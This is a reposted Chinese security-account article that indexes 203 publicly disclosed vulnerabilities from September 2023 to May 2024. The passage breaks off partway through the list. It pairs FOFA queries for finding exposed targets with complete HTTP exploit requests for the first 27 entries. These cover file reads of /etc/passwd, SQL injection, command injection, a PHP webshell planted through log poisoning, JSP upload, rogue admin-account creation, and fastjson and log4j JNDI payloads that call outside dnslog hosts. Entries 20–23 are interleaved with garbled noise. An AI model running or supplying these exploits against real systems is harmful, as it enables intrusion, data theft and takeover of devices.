Internet public vulnerability compilation 202309-202406 (repost)

Posted on 2024-6-5 14:31:29

道一安全 2024-06-05 07:41 Beijing
The following article is from 网络安全新视界; author: 网络安全新视界.

Purpose: Exploiting N-day vulnerabilities accounts for a large share of the attacks seen in offensive/defensive exercises; the hope is that this article helps with defense. Defenders can use its contents to check their own exposure.

Source: The article covers 203 PoCs for high-severity vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024, all taken from other public accounts or websites on the Internet and compiled and published by the 网络安全新视界 team.

Patches: All vulnerabilities listed are public; for patches or remediation, contact the product vendor.

Content: Because of length limits, a few PoCs that are too long are replaced with the word PAYLOAD; search for the complete PoC yourself if you need it.

Legal: If any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the backend to have it removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list". This article is the most complete version; when using it, press F12 and search for the keyword.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).

Contents

01
1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. Byzoro (百卓) Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec 掌上校园 campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE traffic control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE O&M security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. DBAPPSecurity 明御 security gateway aaa_local_web_preview file upload
88. DBAPPSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi An Xin 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. Qi An Xin 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. Beijing 百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. Beijing 百绰智能 S20 backend sysmanageajax.php SQL injection
120. Beijing 百绰智能 S40 management platform import web.php arbitrary file upload
121. Beijing 百绰智能 S42 management platform userattestation.php arbitrary file upload
122. Beijing 百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. Netentsec NS-ASG application security gateway index.php SQL injection
135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. Fujian Kirisun communication command and dispatch platform down_file.php SQL injection
138. Fujian Kirisun communication command and dispatch platform pwd_update.php SQL injection
139. Fujian Kirisun communication command and dispatch platform editemedia.php SQL injection
140. Fujian Kirisun communication command and dispatch platform get_extension_yl.php SQL injection
141. Fujian Kirisun communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system (PACS) WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. Guangzhou 图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behavior management system send_order.cgi command execution
196. Henan 风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 (Aliyundrive) WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS dmku SQL injection
201. Founder omnimedia news editing system binary SQL injection
202. WeEngine (微擎) AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

PoC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Change password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging into the backend with the default account admin, perform the following:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step one>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the double URL-encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the file is uploaded, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step one: obtain the cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request: submits the function that runs a base64-encoded command.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the target to run the id command; the request-header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command string.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The disclosed content includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The disclosed content includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The PoC calls a function to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. 大华ICC智能物联综合管理平台任意文件读取% ]9 {) p; j. f8 D
FOFA:body="*客户端会小于800*"
9 ^! W& `3 T0 H/ G3 \+ [8 ^GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
" Z9 q; t, O+ v0 ^3 m5 f5 |  _  BHost: x.x.x.x. Y& h' {  h( z5 U+ |
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36- }6 t$ ^6 k- d2 S( ^
Connection: close3 k3 A$ }5 W- e9 }& J
Accept: */*
( M  A( v4 o$ Z) s3 E& IAccept-Language: en
, s4 X- w& e+ Y2 x0 X3 G" AAccept-Encoding: gzip
, T5 {" O- _+ R+ ~0 o! W  M8 @: s" g1 r) u/ }. D& n5 u

$ b0 y# o% k% v( A21. 大华ICC智能物联综合管理平台random远程代码执行
! n8 k2 S8 ^: v! z# V. uFOFA:icon_hash="-1935899595"8 Z2 |6 ?" v* Z6 j+ I
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
4 D4 `% }9 f' O0 p5 [Host: x.x.x.x
/ L# z( o5 A  c. f/ i6 P" H5 IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 Y3 x7 C1 o- G6 {+ i( v
Content-Length: 1616 f% G  \  j2 Z+ |
Accept-Encoding: gzip1 n( ?% X* Q% W; H# @4 ~
Connection: close" d+ D) P3 u/ D; m. t' }; o( W; E; j$ O
Content-Type: application/json;charset=utf-8% i3 h8 M+ j6 B& P4 `+ j

  b- }& N; Z9 y5 J{0 r- F, P" y/ \; Q! E
"a":{
$ J! Y% F- I* d" g( B3 h   "@type":"com.alibaba.fastjson.JSONObject",
- v- ~) l& L1 n" N+ D    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
" r3 E) R+ S9 b2 C, F  }""
1 {* o. _( N  v0 K9 }}; Y- b7 @- ~" e1 w7 p5 u- W% l  P& b1 q
7 i& t. Z& f1 e7 q9 Z# Y* d

' e, L& J2 e/ [. l, M22. 大华ICC智能物联综合管理平台 log4j远程代码执行. U1 N$ `; G1 K+ I0 y5 j$ p
FOFA:icon_hash="-1935899595"7 u$ ?4 Y4 u, \0 j% m
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1& a4 @' R5 I5 B; |8 O, b) X7 r7 d
Host: your-ip. |/ c& I. z( C# h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36; O; @  K0 X$ Z3 ~: A
Content-Type: application/json;charset=utf-8
. w* A$ q3 L4 U- b: q
4 X$ j9 p' v* G- z{
+ b& {: O0 u9 ^: v: I1 B"loginName":"${jndi:ldap://dnslog}"
/ {' H! c2 G$ A4 \}
0 [2 l0 m2 S, a. \9 v5 A" n! e' ~
8 Y9 o$ ?+ _6 V" X6 @
1 t. j; J" k8 N: P6 n
, _0 H5 ]/ I/ ^) m7 I& r5 P2 N5 E23. 大华ICC智能物联综合管理平台 fastjson远程代码执行2 A% b& D& N2 u) z' M- y+ j
FOFA:icon_hash="-1935899595"+ R. o  u$ a( a( F* H) m# L
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
$ a0 t% y/ I' D& d2 q7 PHost: your-ip
! }$ _3 K3 `8 g# \0 n7 o( `1 r: BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. ]  c. o' D+ R8 C+ ]! X2 [Content-Type: application/json;charset=utf-8, _6 Y& s1 ~+ t0 X
Accept-Encoding: gzip* N! u- b6 c- b5 I# O. w! {
Connection: close9 b) ]3 J! C# I" \
7 P+ f5 K2 n" z# P6 |
{
1 B# O# K0 \4 L; B1 b9 r( {- E    "a":{
2 W5 }' l# j& d) T        "@type":"com.alibaba.fastjson.JSONObject",1 _- W: a( W% s: u: z
       {"@type":"java.net.URL","val":"http://DNSLOG"}
, n" a8 u& k  m2 \' D7 w$ ?, @        }""
7 l% x! S' r# l/ V}6 k  Y- \! Z  k& A$ B

! m5 G' Y+ I+ i
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
